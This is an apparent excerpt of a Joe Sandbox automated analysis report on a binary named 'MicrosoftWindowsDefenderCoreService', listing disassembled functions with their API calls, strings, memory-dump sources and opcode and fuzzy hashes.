                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 3947729631-0
                                                                                                      • Opcode ID: 8407ddacebe0e615420517ec7c410672e8b9fbc6745f32f22734ea0004e075ac
                                                                                                      • Instruction ID: 6ea974b44a6b5b7f70639f76e66225cd13660f2924e79ed26806565de5358251
                                                                                                      • Opcode Fuzzy Hash: 8407ddacebe0e615420517ec7c410672e8b9fbc6745f32f22734ea0004e075ac
                                                                                                      • Instruction Fuzzy Hash: 7F219132E04B06C9EB18AF68D4802AC73E1FB44B18F840635D65C06AD6DF78E944DBA4
                                                                                                      Function 00007FF76E190B80 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF76E190B94
                                                                                                        • Part of subcall function 00007FF76E1927A0: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF76E1927A8
                                                                                                        • Part of subcall function 00007FF76E1927A0: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF76E1927AD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                      • String ID:
                                                                                                      • API String ID: 1208906642-0
                                                                                                      • Opcode ID: 7bfca5cc03376fee8cc84a428f3c338e5adeb644495df74e029906bd158a1971
                                                                                                      • Instruction ID: f061d929a15a641817b8d5972d6dc13fecd71888fe7c4aedf4467770a16df5d0
                                                                                                      • Opcode Fuzzy Hash: 7bfca5cc03376fee8cc84a428f3c338e5adeb644495df74e029906bd158a1971
                                                                                                      • Instruction Fuzzy Hash: 67E0EC18D0D247C5FDAD366171233B8D2872F21349ED004B8D85F521C3AE8E3C46757A

                                                                                                      Non-executed Functions

                                                                                                      Function 00007FF76E1B1650 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                      • String ID:
                                                                                                      • API String ID: 1617910340-0
                                                                                                      • Opcode ID: 8bebc964633e4e27d84b0127fcb390b0fe7a1db07a09342fb2c511fb4d2ddaff
                                                                                                      • Instruction ID: 14beac8b104930a80b933dfb461654d5c25074e0d43e31bd4aadb8f8383628db
                                                                                                      • Opcode Fuzzy Hash: 8bebc964633e4e27d84b0127fcb390b0fe7a1db07a09342fb2c511fb4d2ddaff
                                                                                                      • Instruction Fuzzy Hash: FCC10232B28A41C6EB14EF65E0802AC7761FB49B98B810336DE6E973D4CF38E455D324
                                                                                                      Function 00007FF76E1AD820 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 239COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                                                      • String ID: utf8
                                                                                                      • API String ID: 3069159798-905460609
                                                                                                      • Opcode ID: a8e12bfc69e101697200b6a1c9cd79548ce90e265cd974d7e899c341f9c85bb0
                                                                                                      • Instruction ID: e6ef79a5788e6787088e8e357c657bca819b127f914f588466669697557e05be
                                                                                                      • Opcode Fuzzy Hash: a8e12bfc69e101697200b6a1c9cd79548ce90e265cd974d7e899c341f9c85bb0
                                                                                                      • Instruction Fuzzy Hash: 23918032A08B42C1E728BF29B4012B9A3A5EB44B88F844131DE5D47B95DF3CE551EB78
                                                                                                      Function 00007FF76E1AE27C Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2591520935-0
                                                                                                      • Opcode ID: 5aa3c2022a6c5e213c7bbbeb4122f9cce8c7d861f063f0e583fbb2ae12f13b46
                                                                                                      • Instruction ID: 1a3c8d667c92bfe62d81dc151009fa9500d247b176ced6c34b3733a43c0202d1
                                                                                                      • Opcode Fuzzy Hash: 5aa3c2022a6c5e213c7bbbeb4122f9cce8c7d861f063f0e583fbb2ae12f13b46
                                                                                                      • Instruction Fuzzy Hash: 27719F22B04652CAFB18AB68E8402BCA3A4BF44744FC44135CE5D57B95DF3CA685E378
                                                                                                      Function 00007FF76E189DD0 Relevance: 10.6, APIs: 7, Instructions: 90filenetworkCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileInternet$OpenRead$CloseCreateHandleWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 1744991900-0
                                                                                                      • Opcode ID: 0e643f24de6e56b96b771349e40c1447714836f73aff6f24d0e0d2060d980734
                                                                                                      • Instruction ID: 543a7acfd9070dfe456fd625b5fc09cdf0913430477e4240adaf55cab5c140aa
                                                                                                      • Opcode Fuzzy Hash: 0e643f24de6e56b96b771349e40c1447714836f73aff6f24d0e0d2060d980734
                                                                                                      • Instruction Fuzzy Hash: DB318122A1868286E7249F61F41476AF760FB85B88F845136DE8D07F44DF3CD0059B28
                                                                                                      Function 00007FF76E1912E0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3140674995-0
                                                                                                      • Opcode ID: 85ae580283c1239024e0937bc9506274967d4fc036943838fd6d8d09f33344d8
                                                                                                      • Instruction ID: 8ca78588f7f2dd693f0a9a0eef4c6ed07f20f679c72705cbcba8e47043f50e8c
                                                                                                      • Opcode Fuzzy Hash: 85ae580283c1239024e0937bc9506274967d4fc036943838fd6d8d09f33344d8
                                                                                                      • Instruction Fuzzy Hash: A0311972608B81C6EB64AF61F8403E9B365FB84744F84413ADA8E57B94DF38D6488734
                                                                                                      Function 00007FF76E19C0F8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1239891234-0
                                                                                                      • Opcode ID: 612c881c9c8ee1586fccea7c9fd5042b90ab35725d194689bafaf2204bcd87b3
                                                                                                      • Instruction ID: 36cf6e501fb25879f89576f338131af7dbbb273dbb96b4a80070adf648bf3185
                                                                                                      • Opcode Fuzzy Hash: 612c881c9c8ee1586fccea7c9fd5042b90ab35725d194689bafaf2204bcd87b3
                                                                                                      • Instruction Fuzzy Hash: 25318436608B81C6EB68DF25F8402AEB3A5FB88754F900136EA8D47B94DF3CD545CB24
                                                                                                      Function 00007FF76E1A9B94 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 2227656907-0
                                                                                                      • Opcode ID: 8cbd06e7d31a27edd69c8a40492ddb11f986bebdf7822f30414eaff6ec58abcc
                                                                                                      • Instruction ID: 5467212da594471c4df6ec804c8aeb43fb843b3c67ce15be91590a21b894d503
                                                                                                      • Opcode Fuzzy Hash: 8cbd06e7d31a27edd69c8a40492ddb11f986bebdf7822f30414eaff6ec58abcc
                                                                                                      • Instruction Fuzzy Hash: A0B1B522B18692C1EA69AB2AF4101B9E391EB44BE4FC44131ED5D47FD9DE3DE481D334
                                                                                                      Function 00007FF76E1A5FF0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 254COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF76E1A603B
                                                                                                        • Part of subcall function 00007FF76E19C414: IsProcessorFeaturePresent.KERNEL32 ref: 00007FF76E19C41D
                                                                                                        • Part of subcall function 00007FF76E19C414: GetCurrentProcess.KERNEL32 ref: 00007FF76E19C442
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                                                      • String ID: PATH$\
                                                                                                      • API String ID: 4036615347-1896636505
                                                                                                      • Opcode ID: ed54544109bcf5aca42db013f3102fcfca9e7846031c5f6f2af4f4b0f88a5cc5
                                                                                                      • Instruction ID: ac031dad234ad5ce9895076c8c28d3d12a9b41e4b1d4955cd8d09310a3a06278
                                                                                                      • Opcode Fuzzy Hash: ed54544109bcf5aca42db013f3102fcfca9e7846031c5f6f2af4f4b0f88a5cc5
                                                                                                      • Instruction Fuzzy Hash: 9A91E461F29216C5FF2CBB6D751127DB6A16F50B88F844835CE1E07BC6DE3CA845A238
                                                                                                      Function 00007FF76E1A5B38 Relevance: 16.7, APIs: 11, Instructions: 163synchronizationCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 2936579111-0
                                                                                                      • Opcode ID: 67fbe1784835731a484da3a16c35548e70f085961f99bb10bc48e8c45e3858ff
                                                                                                      • Instruction ID: 779b764d574f0369f153234ec8a0687372c8d4b6e8e69e4c659cf34c750d3492
                                                                                                      • Opcode Fuzzy Hash: 67fbe1784835731a484da3a16c35548e70f085961f99bb10bc48e8c45e3858ff
                                                                                                      • Instruction Fuzzy Hash: 16615F22F0DB02C6FB18BB65E4401BCA3A2AB45BA4B850536DE5D17FD9CE38E445D378
                                                                                                      Function 00007FF76E197038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: f$f$p$p$f
                                                                                                      • API String ID: 3215553584-1325933183
                                                                                                      • Opcode ID: 2360fc101e954ca8b181993f287e047f5ea9cce105803c0f0e659e7c0b8d4bb4
                                                                                                      • Instruction ID: 5dd44d282ddf50b72f9a47a78c85ad12403548d0ce128299fbcad19893cde2e0
                                                                                                      • Opcode Fuzzy Hash: 2360fc101e954ca8b181993f287e047f5ea9cce105803c0f0e659e7c0b8d4bb4
                                                                                                      • Instruction Fuzzy Hash: F0125D22E0C143C6FB28AA15B0546B9E663FF80754FD84036E699476C4DB7CED90EB78
                                                                                                      Function 00007FF76E1932DC Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                      • String ID: csm$csm$csm
                                                                                                      • API String ID: 849930591-393685449
                                                                                                      • Opcode ID: 1340504e754d9787e77b797c639ac6d3f627f8438c6e3f21e96ee6fe343b0a3c
                                                                                                      • Instruction ID: 4219572f621a34527cb9def4e28b271f8960f692e8b16a141b1a7396bb47e50d
                                                                                                      • Opcode Fuzzy Hash: 1340504e754d9787e77b797c639ac6d3f627f8438c6e3f21e96ee6fe343b0a3c
                                                                                                      • Instruction Fuzzy Hash: D3D1A072A08741C6EB28AB65F4443ADB7A1FB44788F900135EE8D57B96CF38E981D734
                                                                                                      Function 00007FF76E189F60 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 279COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                      • String ID: Failed to open file: $ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$version=
                                                                                                      • API String ID: 3668304517-3690914312
                                                                                                      • Opcode ID: 1cfdb8d0b34dda5e2b6a14e7cd690e97adb5edae016d53631456050e3210f026
                                                                                                      • Instruction ID: 1bf2d4fe411e00c2a16ac20cc298e9d6df1005c5fb657686af32197ec2574627
                                                                                                      • Opcode Fuzzy Hash: 1cfdb8d0b34dda5e2b6a14e7cd690e97adb5edae016d53631456050e3210f026
                                                                                                      • Instruction Fuzzy Hash: D1C1C722F14B85C6EB14EB65E4803BEA761FB40B88F808136DA4D57AD9DF7CE481D364
                                                                                                      Function 00007FF76E1A2544 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 3013587201-537541572
                                                                                                      • Opcode ID: ee297f9163e0f4433d44ddb9cb44c8a0d7b8774eba215f582c9318408fc80d28
                                                                                                      • Instruction ID: 21df551d3b8d7159b3070c821db03270b2ec9c1b6872e94ae9cef2012ae828c2
                                                                                                      • Opcode Fuzzy Hash: ee297f9163e0f4433d44ddb9cb44c8a0d7b8774eba215f582c9318408fc80d28
                                                                                                      • Instruction Fuzzy Hash: 2D41E461B1AA02C1FA1EEB1BB9005B5A291BF45BE0F844235DD1D87B94EF3CE445E738
                                                                                                      Function 00007FF76E183D40 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Event$Source$DeregisterErrorLastRegisterReport
                                                                                                      • String ID: %s failed with %d$MicrosoftWindowsDefenderCoreService$MicrosoftWindowsDefenderCoreService
                                                                                                      • API String ID: 544316925-1642833198
                                                                                                      • Opcode ID: 3dc40fa490e00813dccf98bc73929a08a4ac8a948f6b890265eb78da6b3d84f4
                                                                                                      • Instruction ID: 502e0b7905e47f9d3276025047dffa26889ecfd6bdff33dca7814adb34993b88
                                                                                                      • Opcode Fuzzy Hash: 3dc40fa490e00813dccf98bc73929a08a4ac8a948f6b890265eb78da6b3d84f4
                                                                                                      • Instruction Fuzzy Hash: 4A111F32A08B85C6EB599B10F4553AAB3A0FB8D744F801136EA8D43B54EF7CD154DB24
                                                                                                      Function 00007FF76E1A0F04 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
